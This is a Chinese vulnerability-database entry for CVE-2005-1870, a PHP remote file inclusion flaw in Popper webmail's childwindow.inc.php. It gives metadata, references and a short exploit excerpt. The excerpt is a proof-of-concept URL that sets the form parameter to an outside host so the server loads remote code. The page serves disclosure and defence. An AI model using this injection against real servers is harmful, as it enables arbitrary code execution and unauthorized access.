Popper ‘childwindow.inc.php’脚本 PHP远程文件包含漏洞

Popper ‘childwindow.inc.php’脚本 PHP远程文件包含漏洞

漏洞ID 1108833 漏洞类型 未知
发布时间 2005-06-03 更新时间 2005-06-09
图片[1]-Popper ‘childwindow.inc.php’脚本 PHP远程文件包含漏洞-安全小百科CVE编号 CVE-2005-1870
图片[2]-Popper ‘childwindow.inc.php’脚本 PHP远程文件包含漏洞-安全小百科CNNVD-ID CNNVD-200506-064
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25788
https://www.securityfocus.com/bid/89872
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-064
|漏洞详情
Popper1.41-r2及早期版本的childwindow.inc.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助form参数执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/13851/info

Popper is affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/popper/childwindow.inc.php?form=http://www.example.com/test
|受影响的产品
Popper Popper 1.41 R2
|参考资料

来源:OSVDB
名称:17085
链接:http://www.osvdb.org/17085
来源:SECTRACK
名称:1014116
链接:http://securitytracker.com/id?1014116
来源:MISC
链接:http://security.lss.hr/en/index.php?page=details&ID;=LSS-2005-06-07
来源:SECUNIA
名称:15584
链接:http://secunia.com/advisories/15584
来源:FULLDISC
名称:20050605Re:LSS.hrfalsepositives.(correction)
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=111801389729155&w;=2
来源:FULLDISC
名称:20050606Popperwebmailremotecodeexecutionvulnerability-advisoryfix
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034425.html
来源:FULLDISC
名称:20050604LSS.hrfalsepositives.
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034408.html

相关推荐: Microsoft ASN.1 Library Multiple Stack-Based Buffer Overflow Vulnerabilities

Microsoft ASN.1 Library Multiple Stack-Based Buffer Overflow Vulnerabilities 漏洞ID 1098914 漏洞类型 Boundary Condition Error 发布时间 2004-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享